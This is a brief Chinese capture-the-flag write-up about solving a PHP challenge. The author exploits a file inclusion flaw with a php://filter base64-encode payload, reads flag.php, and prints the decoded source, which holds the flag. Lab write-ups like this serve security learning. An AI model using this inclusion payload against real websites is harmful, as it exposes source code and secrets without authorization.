打开靶机,看到有个flag.php,flag应该是在这里
访问之后并没有什么有用的信息
利用include漏洞读取flag.php看看 ?file=php://filter/read=convert.base64-encode/resource=flag.php
使用base64解码后得到 flag,提交完成解题
<?php
echo "Can you find out the flag?";
//flag{d8573a2b-b409-44af-99a2-c16e8ed66ccc}